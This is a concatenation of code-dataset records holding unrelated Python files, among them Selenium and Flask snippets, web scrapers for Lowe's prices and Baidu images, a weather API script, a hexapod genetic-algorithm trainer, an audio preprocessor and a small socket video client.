webdriver.Firefox(profile)\ndriver.implicitly_wait(10)\ndriver.get(\"https://www.cleartrip.com/\")\nsleep(6)\ndriver.quit()","sub_path":"Selenium/Selenium/Popups/DisableNotificationpopupFirefox.py","file_name":"DisableNotificationpopupFirefox.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"79092800","text":"# str\n\nstr1 = 'Codekul - The Gurukul for Coders!'\nres = len(str1)\n\nstr2 = \"Python Batch\"\nstr3 = str1 + str2\n\nstr4 = str1.replace(\" \", \"_\")\nprint(str4)\n\n# List\n\nlist1 = [1,2,3,4,5,'Seven', 8.9, True]\n\nlist1.append(6)\n\nlist2 = [2,3,4]\n\nlist3 = list1 + list2\nlist3[2] = 30\nlist3.remove('Seven')\nprint(list3)\n\n# dictionary\n\ndict1 = {'key1': 'value1', 'key2': 'value2', 'abc': 123, 1: 'One'}\ndict1['Two'] = 2\n# print(dict1[2])\n\n# tuple\n\nt1 = (1,2,3,4, 'Five', 6.7, True)\n\nprint(t1[0])","sub_path":"collectionsDemo.py","file_name":"collectionsDemo.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"331360479","text":"\"\"\"\n config file that declare logging system\n and its handling to Fluend log system.\n Gives logging object as 'LOG' to call needed log method, ex:\n \"Critical, ERROR, WARNING, INFO, DEBUG, NOTSET\"\n\"\"\"\n\nimport logging\nfrom fluent import handler\n\nHOST = 'localhost' #'heatmaptraining_fluentd_1'\nPORT = 24224\nLOGGING_LEVEL = logging.DEBUG\n\n\n# format for data that saves into general log file via Fluentd.\nCUSTOM_FORMAT = {\n 'host': '%(hostname)s',\n 'where': '%(module)s.%(funcName)s',\n 'type': '%(levelname)s',\n 'stack_trace': '%(exc_text)s'\n}\n\n# sets level of logging\nlogging.basicConfig(level=LOGGING_LEVEL)\n\n# ! ! ! used to Import ! ! !\n# gets logger from logging module.\nLOG = logging.getLogger('foo')\n\n# gets handler\nMY_HANDLER = handler.FluentHandler('app.follow', host=HOST, port=PORT)\n\n# gets formatter with custom format\nFORMATTER = handler.FluentRecordFormatter(CUSTOM_FORMAT)\n\n# sets format for Fluend handler\nMY_HANDLER.setFormatter(FORMATTER)\n\n# adds handler for logging\nLOG.addHandler(MY_HANDLER)\n","sub_path":"general_helper/logger/log_config.py","file_name":"log_config.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"213884484","text":"#coding: utf-8\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef func(x):\n y=3*x**2-1\n return y\n\nxmin=-2\nxmax=2\nnum=100\n\nx=np.linspace(xmin,xmax,num)#minからmaxの間でnumの要素を作る\ny=func(x)\n\nplt.plot(y)\nplt.grid()\nplt.show()\n","sub_path":"20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"204596605","text":"from flask import Blueprint\nfrom flask_restful import Api\n\nfrom resources.cash_flow.cash_flow_api import (\n MonthlyInflowOutflow,\n MonthlyCumInflowOutflowBalance,\n MonthlyBalance,\n RevenueExpenseKpi,\n ClintWiseInflowPercent,\n HeadWiseOutflowPercent,\n MonthlyTopkRevenue,\n MonthlyTopkExpense,\n MonthlyForcast,\n HistAndPredWeeklyData,\n CustomerMonthlyRevenue,\n AnnulQuarterMonthWeekRevenue,\n UploadDataFile,\n ProcessCashFlowFiles,\n CleanUpClientData\n )\n\n\ncash_flow_bp = Blueprint('cash_flow_api', __name__)\ncash_flow_api = Api(cash_flow_bp)\n\ncash_flow_api.add_resource(MonthlyInflowOutflow,'/cash_flow/monthly_inflow_outflow/')\ncash_flow_api.add_resource(MonthlyCumInflowOutflowBalance,'/cash_flow/cum_inflow_outflow_balance/') \ncash_flow_api.add_resource(MonthlyBalance, '/cash_flow/monthly_cash_balance/' )\ncash_flow_api.add_resource(RevenueExpenseKpi, '/cash_flow/revenue_expense_kpi/' )\n\ncash_flow_api.add_resource(ClintWiseInflowPercent, '/cash_flow/clientwise_inflow/')\ncash_flow_api.add_resource(HeadWiseOutflowPercent, '/cash_flow/deffent_headwise_outflow/')\ncash_flow_api.add_resource(MonthlyTopkRevenue, '/cash_flow/monthly_topk_revenue/')\ncash_flow_api.add_resource(MonthlyTopkExpense, '/cash_flow/monthly_topk_expense/')\n\ncash_flow_api.add_resource(MonthlyForcast, '/cash_flow/monthly_cash_blance_forecast/')\ncash_flow_api.add_resource(HistAndPredWeeklyData, '/cash_flow/weekly_hist_pred_data/')\n\ncash_flow_api.add_resource(CustomerMonthlyRevenue, '/cash_flow/customer_monthly_revenue/')\n\ncash_flow_api.add_resource(AnnulQuarterMonthWeekRevenue, '/cash_flow/interactive_time_sereis/')\n\ncash_flow_api.add_resource(UploadDataFile, '/cash_flow/upload_data_file/')\ncash_flow_api.add_resource(ProcessCashFlowFiles, '/cash_flow/process_data_file/')\ncash_flow_api.add_resource(CleanUpClientData, '/cash_flow/delete_client_data/')","sub_path":"AAP/source/code/blue_prints/cash_flow.py","file_name":"cash_flow.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"199213607","text":"# Dependencies\nimport requests\nimport json\n\n# Weather\napi_key = \"c7f9f57b4779391ea1f5ae067591c971\"\n\n# Endpoint URL for five day forecast Phoenix, AZ\ntarget_url = \"http://api.openweathermap.org/data/2.5/forecast\" \\\n \"?q=Phoenix,us&units=IMPERIAL&mode=json&APPID=\" + api_key\n\n# Print URL\nprint(target_url)\n\n# Request Data\ncity_weather = requests.get(target_url).json()\n\n# Display the weather with dates\nfor temp in city_weather[\"list\"]:\n print(\"%s | %s F\" % (temp[\"dt_txt\"], temp[\"main\"][\"temp\"]))\n","sub_path":"06-API/3/Activities/01-Stu_Wrapper_Recap/Solved/WeatherForecast.py","file_name":"WeatherForecast.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"115684126","text":"import numpy as np\n\ndef calculate_correlation(list1,list2):\n \"\"\" calculates a cross correlation between two lists (list1, list2),\n to find out the time lag between disturbance and response by the\n pilot. The lists contain timeseries of the respective variable,\n not an averaged or absolute value!\n\n Args:\n list1: a list of aircraft behaviour data (either GS or LOC)\n --> glideslope deviation\n --> loc deviation\n list2: a list of pilot response data\n --> control wheel input\n --> control column input\n --> thrust input\n \n The following combinations shall be calculated:\n 1. glideslope deviation (list1) vs thrust input (list2)\n 2. glideslope deviation (list1) vs column input (list2)\n 3. localizer deviation (list1) vs wheel input (list2)\n\n Returns:\n time_difference: the average time difference between\n disturbance and response, if |result control correlation|!= result\n correlation, return value shall be 'nan'.\n Step two of the implementation should be a condition to exclude \n reaction times > 5 secs as these values probably do not carry any \n value. So far, the values shall be produced regardless their meaning-\n fulness.\n\n Raises:\n None. \n \"\"\"\n #correlation between GSDeviation and Thrust (numpy)\n correlation = np.correlate(list1, list2,\"full\"); #consider from buffer\n correlation_verify = np.correlate(list2, list1, \"full\");\n #max value in correlation matrix\n correlation_maximum = max(np.abs(correlation));\n correlation_maximum_verify = max(np.abs(correlation_verify))\n #create list from correlation\n #correlation = list(correlation);\n \n\n #create numpy list of correlation\n correlation_absolute = np.absolute(correlation)\n correlation_absolute_verify = np.absolute(correlation_verify)\n \n #calculate the time difference \n #time_difference: actual time difference between both signals\n #time_difference_verify: calculates time difference with the arguments \n #lists changed --> control, if result of time difference == |result of time\n #difference_verify| is identical.\n time_difference = calculate_delay(correlation_absolute, \n correlation_maximum);\n time_difference_verify = calculate_delay(correlation_absolute_verify, \n correlation_maximum_verify);\n \n #find index of highest value in correlation matrix\n print(time_difference-time_difference_verify);\n #reaction time would be smaller than 1 secs, considered unrealistic at \n #this point\n if time_difference <= 1:\n return(float('NaN'));\n \n #leave some tolerance between control and actual value\n if time_difference - abs(time_difference_verify) < -4:\n return(float('NaN'));\n \n #if time difference is greater than 10 secs, reaction time carries no \n #relevant information as pilot must have reacted to disturbance before\n if time_difference > 10:\n return(float('NaN'));\n \n return time_difference;\n\ndef calculate_delay(correlation_absolute, correlation_maximum):\n \"\"\" calculates the time delay between two signals.\n\n Args:\n correlation absolute: list of the correlation values\n correlation_maximum: maximum value of the correlation_absolute list\n\n Returns:\n time_difference: time difference of signals in secs. \n Raises:\n None. If calculation fails, return value changes to 'nan'. \n \"\"\"\n i = 0;\n for x in correlation_absolute:\n if correlation_maximum == correlation_absolute[i]:\n position = i;\n #print(position)\n lag=[];\n #fill lag list\n try:\n #check, if length of correlation_absolute list is odd or even.\n if len(correlation_absolute) % 2 > 0:\n startvalue = ((len(correlation_absolute) -1) / 2) * (-1);\n #fill lag list with ascending integers, starting from \n #halved correlation_absolute length - 1\n for x in correlation_absolute:\n lag.append(startvalue);\n startvalue += 1;\n else:\n startvalue = (len(correlation_absolute) / 2) * (-1);\n #fill lag list with ascending integers, starting from \n #halved correlation_absolute length\n for x in correlation_absolute:\n lag.append(startvalue);\n startvalue += 1;\n #find lag time\n lag_difference = lag[position];\n \n #calculate lag time dependent on frequency\n #frequency is assumed to be 1!!!!\n frequency = 1;\n time_difference = lag_difference/frequency;\n return time_difference;\n except BaseException:\n time_difference = float('NaN');\n i += 1;","sub_path":"fatigueEvaluation/preparations/calculateCrossCorrelation.py","file_name":"calculateCrossCorrelation.py","file_ext":"py","file_size_in_byte":5149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"212397449","text":"# !/usr/bin/env python\r\n# _*_ coding:utf-8 _*_\r\n# author:AI悦创 2019/9/17 15:49\r\n\"\"\"\r\n# code is far away from bugs with the god animal protecting\r\n    I love animals. They taste delicious.\r\n              ┏┓      ┏┓\r\n            ┏┛┻━━━┛┻┓\r\n            ┃      ☃      ┃\r\n            ┃  ┳┛  ┗┳  ┃\r\n            ┃      ┻      ┃\r\n            ┗━┓      ┏━┛\r\n                ┃      ┗━━━┓\r\n                ┃  神兽保佑    ┣┓\r\n                ┃ 永无BUG!   ┏┛\r\n                ┗┓┓┏━┳┓┏┛\r\n                  ┃┫┫  ┃┫┫\r\n                  ┗┻┛  ┗┻┛\r\n\"\"\"\r\n# _._ encoding = utf-8 _._\r\nimport re # regex\r\nimport os # system\r\nimport time\r\nimport collections\r\nfrom collections import namedtuple\r\n\r\nimport requests\r\nfrom concurrent import futures\r\nfrom tqdm import tqdm\r\nfrom enum import Enum\r\n\r\n\r\nBASE_URL = 'https://image.baidu.com/search/acjson?tn=resultjson_com&ipn=rj&ct=201326592&is=&fp=result&queryWord={keyword}&cl=2&lm=-1&ie=utf-8&oe=utf-8&adpicid=&st=-1&z=&ic=&hd=&latest=©right=&word={keyword}&s=&se=&tab=&width=&height=&face=0&istype=2&qc=&nc=1&fr=&expermode=&force=&pn={page}&rn=30&gsm=&1568638554041='\r\n\r\nHEADERS = {\r\n\t'Referer': 'http://image.baidu.com/search/index?tn=baiduimage&ipn=r&ct=201326592&cl=2&lm=-1&st=-1&fr=&sf=1&fmq=1567133149621_R&pv=&ic=0&nc=1&z=0&hd=0&latest=0©right=0&se=1&showtab=0&fb=0&width=&height=&face=0&istype=2&ie=utf-8&sid=&word=%E5%A3%81%E7%BA%B8',\r\n\t'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',\r\n\t'X-Requested-With': 'XMLHttpRequest', }\r\n\r\nclass BaiDuSpider:\r\n def __init__(self, max_works):\r\n self.max_works = max_works\r\n self.HTTPStatus = Enum('Status', ['ok', 'not_found', 'error'])\r\n self.result = namedtuple('Result', 'status data')\r\n self.session = requests.session()\r\n self.img_type = None\r\n self.img_num = None\r\n self.headers = HEADERS\r\n self.index = 1\r\n\r\n def get_img(self, img_url):\r\n res = self.session.get(img_url)\r\n if res.status_code != 200:\r\n res.raise_for_status()\r\n\r\n return res.content\r\n\r\n def download_one(self, img_url, verbose):\r\n try:\r\n image = self.get_img(img_url)\r\n except requests.exceptions.HTTPError as e:\r\n res = e.response\r\n if res.status_code == 404:\r\n status = self.HTTPStatus.not_found\r\n msg = 'not_found'\r\n else:\r\n raise\r\n else:\r\n self.save_img(self.img_type, image)\r\n status = self.HTTPStatus.ok\r\n msg = 'ok'\r\n\r\n if verbose:\r\n print(img_url, msg)\r\n\r\n return self.result(status, msg)\r\n\r\n def get_img_url(self):\r\n urls = [BASE_URL.format(keyword=self.img_type, page=page) for page in self.img_num]\r\n for url in urls:\r\n res = self.session.get(url, headers=self.headers)\r\n if res.status_code == 200:\r\n img_list = re.findall(r'\"thumbURL\":\"(.*?)\"', res.text)\r\n # 返回出图片地址,配合其他函数运行\r\n yield {img_url for img_url in img_list}\r\n elif res.status_code == 404:\r\n print('-----访问失败,找不到资源-----')\r\n yield None\r\n elif res.status_code == 403:\r\n print('*****访问失败,服务器拒绝访问*****')\r\n yield None\r\n else:\r\n print('>>> 网络连接失败 <<<')\r\n yield None\r\n\r\n def download_many(self, img_url_set, verbose=False):\r\n if img_url_set:\r\n counter = collections.Counter()\r\n with futures.ThreadPoolExecutor(self.max_works) as executor:\r\n to_do_map = {}\r\n for img in img_url_set:\r\n future = executor.submit(self.download_one, img, verbose)\r\n to_do_map[future] = img\r\n done_iter = futures.as_completed(to_do_map)\r\n\r\n if not verbose:\r\n done_iter = tqdm(done_iter, total=len(img_url_set))\r\n for future in done_iter:\r\n try:\r\n res = future.result()\r\n except requests.exceptions.HTTPError as e:\r\n error_msg = 'HTTP error {res.status_code} - {res.reason}'\r\n error_msg = error_msg.format(res=e.response)\r\n except requests.exceptions.ConnectionError:\r\n error_msg = 'ConnectionError error'\r\n else:\r\n error_msg = ''\r\n status = res.status\r\n\r\n if error_msg:\r\n status = self.HTTPStatus.error\r\n\r\n counter[status] += 1\r\n\r\n if verbose and error_msg:\r\n img = to_do_map[future]\r\n print('***Error for {} : {}'.format(img, error_msg))\r\n return counter\r\n else:\r\n pass\r\n\r\n def save_img(self, img_type, image):\r\n with open('{}/{}.jpg'.format(img_type, self.index), 'wb') as f:\r\n f.write(image)\r\n self.index += 1\r\n\r\n def what_want2download(self):\r\n self.img_type = input('请输入你想下载的图片类型,什么都可以哦~ >>> ')\r\n try:\r\n os.mkdir(self.img_type)\r\n except FileExistsError:\r\n pass\r\n img_num = input('请输入要下载的数量(1位数代表30张,列如输入1就是下载30张,2就是60张):>>> ')\r\n while True:\r\n if img_num.isdigit():\r\n img_num = int(img_num)*30\r\n self.img_num = range(30, img_num+1, 30)\r\n break\r\n else:\r\n img_num = input('输入错误,请重新输入要下载的数量>>> ')\r\n\r\n def main(self):\r\n # 获取图片类型和下载的数量\r\n total_counter = {}\r\n self.what_want2download()\r\n for img_url_set in self.get_img_url():\r\n if img_url_set:\r\n counter = self.download_many(img_url_set, False)\r\n for key in counter:\r\n if key in total_counter:\r\n total_counter[key] += counter[key]\r\n else:\r\n total_counter[key] = counter[key]\r\n\r\n else:\r\n # 可以为其添加报错功能\r\n pass\r\n\r\n time.sleep(.5)\r\n return total_counter\r\n\r\n\r\nif __name__ == '__main__':\r\n max_works = 20\r\n bd_spider = BaiDuSpider(max_works)\r\n print(bd_spider.main())","sub_path":"Coder_Old/pycharm_daima/爬虫大师班/作业一/3.0版本/多线程版.py","file_name":"多线程版.py","file_ext":"py","file_size_in_byte":6914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"257048889","text":"from hexapod import Hexapod\nimport vrep\nimport time\nimport sys \nimport pickle\nimport numpy as np \nimport pickle\n\nfrom tensorflow import keras\n\nfrom math import sin \nfrom gaft import GAEngine\nfrom gaft.components import BinaryIndividual, Population\nfrom gaft.operators import RouletteWheelSelection, UniformCrossover, FlipBitMutation\nfrom gaft.analysis import ConsoleOutput,fitness_store\n\n# Analysis plugin base class.\nfrom gaft.plugin_interfaces.analysis import OnTheFlyAnalysis\n\nindv_template = BinaryIndividual(ranges=[(-10,35),(40,60),(-40,-15),(15,50),(-70,-30),(0,20),(0.001,0.01)], eps=0.001)\npopulation = Population(indv_template=indv_template, size=16)\npopulation.init() # Initialize population with individuals.\n# with open('./backup-in-10.pickle','rb') as f:\n# population=pickle.load(f)\n\n# Use built-in operators here.\nselection = RouletteWheelSelection()\ncrossover = UniformCrossover(pc=0.8, pe=0.5)\nmutation = FlipBitMutation(pm=0.1)\n\nengine = GAEngine(population=population, selection=selection,\n crossover=crossover, mutation=mutation, analysis=[ConsoleOutput])\n\n\n@engine.fitness_register\ndef fitness(indv):\n rb.start_simulation()\n # time.sleep(0.5)\n rb.init()\n run_time=20000\n data=list(indv.solution)\n rb.set_step_data(stepData.gen_data([data[:2],data[2:4],data[4:6]]))\n # start_time=rb.get_time()\n # while rb.get_time()-start_time{1}}} {2}%\".format('='*round(g*L/N),\n# '.'*round((N-g)*L/N), round(g*100/N)), end=\"\\r\")\n\n\n\ndef connect(retry):\n while True:\n # vrep.simxFinish(-1) # 关掉之前的连接\n clientId = vrep.simxStart(\n \"127.0.0.1\", 19997, True, True, 100, 5) # 建立和服务器的连接\n if clientId != -1: # 连接成功\n print('connect successfully')\n return clientId\n elif retry > 0:\n retry -= 1\n else:\n print('connect time out')\n sys.exit(1)\n time.sleep(1)\n\nclass Data(object):\n def __init__(self):\n self.model=[]\n pre=['./data/NN_ahead','./data/NN_middle','./data/NN_back']\n for i in range(3):\n self.model.append(keras.models.load_model('{}.h5'.format(pre[i])))\n def gen_data(self,sample_range,sample_rate=50):\n self.data=[]\n for i in range(3):\n model=self.model[i]\n sampling_point=np.linspace(min(sample_range[i]),max(sample_range[i]),sample_rate)\n sampling_point=sampling_point.reshape(sampling_point.shape[0],1)\n predict=model.predict(sampling_point)\n sampling_point= np.around(sampling_point,decimals=1)\n predict= np.around(predict,decimals=1)\n result=np.concatenate([sampling_point,predict],axis=1)\n self.data.append(result)\n return self.data\n\n\n\nclient_id=connect(10)\nrb=Hexapod(client_id)\n\nstepData=Data()\n\nif __name__ == \"__main__\":\n engine.run(ng=50)\n","sub_path":"deprecated/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"142832493","text":"import json\nimport requests\nfrom pyquery import PyQuery as pq\nimport urllib.error as error\nfrom urllib.parse import quote\nfrom urllib.request import (urlopen, Request)\nfrom core.settings import SCRAPER_API_KEY\n\nclass Competitor:\n def __init__(self, model_number, url):\n self.model_number = model_number\n self.url = url\n self.document_obj = None\n\n def search_product(self):\n if self.url:\n return(self.get_price())\n else:\n try:\n search_url = \"https://www.lowes.com/search?searchTerm=\"+self.model_number #lowe's\n code = self.set_response(search_url)\n if code:\n return code, False\n else:\n return(self.get_lowes_url())\n \n except Exception as e:\n print('Lows search Exception', e)\n return False, False\n\n def set_response(self, url):\n headers = {'User-Agent': 'pyquery'}\n cookies= {'intl_splash': 'false'}\n try:\n request = Request('http://api.scraperapi.com/?key=' + SCRAPER_API_KEY + '&url=' + quote(url), headers=headers)\n response_body = urlopen(request).read()\n self.document_obj = pq(response_body)\n except error.HTTPError as e:\n print('LOWES Response Exception', e)\n return e.code\n \n\n def get_lowes_url(self):\n try:\n if self.document_obj :\n link = self.document_obj('link').filter(lambda rel : pq(this).attr('rel') == 'canonical')\n product_url = link.attr('href') if link else False\n if product_url:\n prod_url_data = product_url.split('/')\n prod_id = prod_url_data[len(prod_url_data)-1]\n prod_id = prod_id.split('?')[0]\n price = self.get_price_url(prod_id) if prod_id else False\n else:\n price = False\n return product_url, price\n else :\n return False, False\n \n except Exception as e:\n print('LOWES Exception', e)\n\n \n def get_price_url(self, prod_id):\n \n st_url = 'https://www.lowes.com/wcs/resources/store/10151/storelocation/v1_0?maxResults=1&query=0477'\n headers = {'Accept': 'application/json'}\n \n try:\n st_req = Request('http://api.scraperapi.com/?key=' + SCRAPER_API_KEY + '&url=' + quote(st_url), headers=headers)\n response = urlopen(st_req).read()\n res = pq(response).text()\n store_number = json.loads(res)['storeLocation'][0]['storeNumber']\n\n if response == float(0):\n return False\n \n price_url = 'https://www.lowes.com/PricingServices/price/balance?productId=%s&storeNumber=%s'%(prod_id, store_number if response else '0477')\n price_req = Request('http://api.scraperapi.com/?key=' + SCRAPER_API_KEY + '&url=' + quote(price_url), headers=headers)\n price_res = urlopen(price_req).read()\n response_body = pq(price_res).text()\n \n except error.HTTPError:\n print('lows price Exception ', error.HTTPError)\n return False\n return float(json.loads(response_body)[0]['price']['selling'])\n\n\n \n def get_price(self):\n \n st_url = 'https://www.lowes.com/wcs/resources/store/10151/storelocation/v1_0?maxResults=1&query=0477'\n headers = {'Accept': 'application/json'}\n \n try:\n prod_id = self.url.split('/')\n prod_id = prod_id[len(prod_id)-1]\n if '?' in prod_id:\n prod_id = prod_id.split('?')[0]\n\n st_req = Request('http://api.scraperapi.com/?key=' + SCRAPER_API_KEY + '&url=' + quote(st_url), headers=headers)\n response = urlopen(st_req).read()\n store_number = json.loads(response)['storeLocation'][0]['storeNumber']\n # response = json.loads(requests.get(st_url).content) if requests.get(st_url).content is not None else float(0)\n if response == float(0):\n return False, False\n # price_url = 'https://www.lowes.com/PricingServices/price/balance?productId=%s&storeNumber=%s'%(prod_id, response['storeLocation'][0]['storeNumber'] if response else '0477')\n price_url = 'https://www.lowes.com/PricingServices/price/balance?productId=%s&storeNumber=%s'%(prod_id, store_number if response else '0477')\n price_response = requests.get(price_url)\n \n request = Request('http://api.scraperapi.com/?key=' + SCRAPER_API_KEY + '&url=' + quote(price_url), headers=headers)\n response_body = urlopen(request).read()\n \n except error.HTTPError:\n print('lows Exception >>>>>>>>>>>>>>>>>>>>>>>', error.HTTPError)\n return False, False\n if price_response.status_code == 400:\n return False, False\n # return float(price_response.json()[0]['price']['selling'])\n return self.url, float(json.loads(response_body)[0]['price']['selling'])\n\n\n","sub_path":"src/competitor/scrappers/lows.py","file_name":"lows.py","file_ext":"py","file_size_in_byte":5162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125370194","text":"#\r\n# [893] All Nodes Distance K in Binary Tree\r\n#\r\n# https://leetcode.com/problems/all-nodes-distance-k-in-binary-tree/description/\r\n#\r\n# algorithms\r\n# Medium (41.04%)\r\n# Total Accepted: 6.5K\r\n# Total Submissions: 15.7K\r\n# Testcase Example: '[3,5,1,6,2,0,8,null,null,7,4]\\n5\\n2'\r\n#\r\n# We are given a binary tree (with root node root), a target node, and an\r\n# integer value K.\r\n#\r\n# Return a list of the values of all nodes that have a distance K from the\r\n# target node.  The answer can be returned in any order.\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n#\r\n# Example 1:\r\n#\r\n#\r\n# Input: root = [3,5,1,6,2,0,8,null,null,7,4], target = 5, K = 2\r\n#\r\n# Output: [7,4,1]\r\n#\r\n# Explanation:\r\n# The nodes that are a distance 2 from the target node (with value 5)\r\n# have values 7, 4, and 1.\r\n#\r\n#\r\n#\r\n# Note that the inputs \"root\" and \"target\" are actually TreeNodes.\r\n# The descriptions of the inputs above are just serializations of these\r\n# objects.\r\n#\r\n#\r\n#\r\n#\r\n# Note:\r\n#\r\n#\r\n# The given tree is non-empty.\r\n# Each node in the tree has unique values 0 <= node.val <= 500.\r\n# The target node is a node in the tree.\r\n# 0 <= K <= 1000.\r\n#\r\n#\r\n#\r\n#\r\n# Definition for a binary tree node.\r\nclass TreeNode:\r\n def __init__(self, x):\r\n self.val = x\r\n self.left = None\r\n self.right = None\r\n\r\n\r\nclass Solution:\r\n def __init__(self):\r\n self.parents = {}\r\n\r\n def dfs(self, cur, parent):\r\n if not cur:\r\n return\r\n self.parents[cur] = parent\r\n if cur.left:\r\n self.dfs(cur.left, cur)\r\n if cur.right:\r\n self.dfs(cur.right, cur)\r\n\r\n def distanceK(self, root, target, K):\r\n \"\"\"\r\n :type root: TreeNode\r\n :type target: TreeNode\r\n :type K: int\r\n :rtype: List[int]\r\n \"\"\"\r\n if not root or not target:\r\n return []\r\n if K == 0:\r\n return [target.val]\r\n res = []\r\n # first add parent link and convert the tree into graph\r\n self.dfs(root, None)\r\n curLevel = 0\r\n q = [target]\r\n visited = {target}\r\n # then use BFS to get the needed distance\r\n while curLevel < K:\r\n curLen = len(q)\r\n for i in range(curLen):\r\n curNode = q[i]\r\n for newNode in (curNode.left, curNode.right,\r\n self.parents[curNode]):\r\n if newNode and newNode not in visited:\r\n visited.add(newNode)\r\n q.append(newNode)\r\n q = q[curLen:]\r\n curLevel += 1\r\n res = list(map(lambda x: x.val, q))\r\n return res\r\n\r\n\r\ndef main():\r\n target = root = TreeNode(0)\r\n root.right = TreeNode(1)\r\n root.right.right = TreeNode(2)\r\n root.right.right.right = TreeNode(3)\r\n\r\n print(Solution().distanceK(root, target, 2))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"Medium/863.all-nodes-distance-k-in-binary-tree.python3.py","file_name":"863.all-nodes-distance-k-in-binary-tree.python3.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"560938688","text":"import librosa\r\nfrom tqdm import tqdm\r\nfrom keras.utils import np_utils\r\nimport numpy as np\r\nimport os\r\ndest=os.listdir('dataset')\r\nlabel=[]\r\nfeature=[]\r\n#print(label)\r\n\r\nfor i in (range(len(dest))):\r\n try:\r\n fi='dataset/'+dest[i]\r\n print(fi)\r\n data,rate=librosa.load(fi)\r\n data=data[len(data)-5000:len(data)]\r\n #print(rate)\r\n mfcc=librosa.feature.mfcc(y=data,sr=rate,n_mfcc=5)\r\n print(mfcc.shape)\r\n if(mfcc.shape==(5,10)):\r\n l=dest[i]\r\n print(1)\r\n label.append(int(l[0]))\r\n print(2)\r\n feature.append(mfcc)\r\n print(3)\r\n #print(label) \r\n except:\r\n print('File not found')\r\n\r\n#print(len(train))\r\n#print(len(label))\r\n#label=np.array(label)\r\nlabel=np_utils.to_categorical(label,10)\r\nfeature=np.array(feature)\r\ntrain_label,test_label=label[0:1920],label[1920:2400]\r\ntrain_feature,test_feature=feature[0:1920],feature[1920:2400]\r\n\r\nnp.save('array/train_label',train_label)\r\nnp.save('array/test_label',test_label)\r\nnp.save('array/train_feature',train_feature)\r\nnp.save('array/test_feature',test_feature)\r\n\r\n","sub_path":"codes/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"428716614","text":"import socket\nimport numpy as np\nfrom socket import AF_INET, SOCK_STREAM\nimport cv2\n\nclient = socket.socket(AF_INET, SOCK_STREAM)\nclient.connect(('localhost', 9899)) # tuple\n\nwhile True:\n\n data = client.recv(1024)\n\n size = int(data.decode()) # decode는 스트링에서 바이트\n print(\"image size\")\n print(size)\n\n client.sendall(\"ok\".encode())\n\n image_data = b''\n while size > 0:\n print(size)\n image_data += client.recv(1024)\n size -= 1024\n\n client.sendall(\"b\".encode())\n\n nparr = np.fromstring(image_data, np.uint8)\n image = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n\n cv2.imshow('image.jpeg', image)\n\n if cv2.waitKey(1) & 0xff == ord('q'):\n break\n","sub_path":"MyProject/tutoring/exc - 복사본/net/video_client.py","file_name":"video_client.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"125122025","text":"\nimport unpickle as up\nimport numpy as np\nfrom keras.utils import np_utils\nfrom dat_extract.extract.Ship_Variable_Extraction import Ship\nimport random\n\ndef get_data(folder):\n ships = up.unpickle_ships(folder)\n random.shuffle(ships)\n train_data_size = 5*(len(ships)/6)\n test_data_size = len(ships)/6\n train_spect = []\n test_spect = []\n \n train_speeds = []\n test_speeds = []\n speeds_categories = []\n \n i = 0\n while len(train_spect) self.surface.get_width() + DESTROY_TOLERANCE) or\\\r\n (self.y < -DESTROY_TOLERANCE or self.y > self.surface.get_height()+DESTROY_TOLERANCE):\r\n return True\r\n else: \r\n return False\r\n\r\n \r\n def check_collision(self, shot):\r\n if shot.x - self.size < self.x < shot.x + self.size and shot.y - self.size < self.y < shot.y + self.size:\r\n return True\r\n else:\r\n return False\r\n \r\n def take_damage(self):\r\n self.size -= Property.get('damage')\r\n\r\n ","sub_path":"Meteor.py","file_name":"Meteor.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"153537473","text":"# importing all necissary libraries\nimport os as os\nimport sys as sys\n\n\ndef getArgs(n): #retrieves the given parameters from the command line and stores them in a list\n arg = []\n cnt = 0\n for argument in sys.argv:\n arg.append(sys.argv[cnt])\n cnt = cnt + 1\n return arg[n]\n\ndef getPath():\n path = getArgs(1) #retrieve the path argument\n if path != \"\":\n return path\n else:\n print(\"No path given! Please provide a path relative to this directory\")\n\ndef getFileNames(): #creates a list of all file names in the path directory\n fileList = []\n path = getPath()\n cnt = 0\n for file in os.listdir(str(path)):\n fileList.append(os.listdir(str(path))[cnt])\n cnt = cnt + 1\n return fileList\n\ndef createFunctionLists(file):\n path = getPath()\n functionList = []\n wordList = []\n cnt = 0\n func = \"function\"\n with open(path + '/' + file, 'r') as f:\n for line in f:\n for word in line.split():\n wordList.append(str(word))\n for word 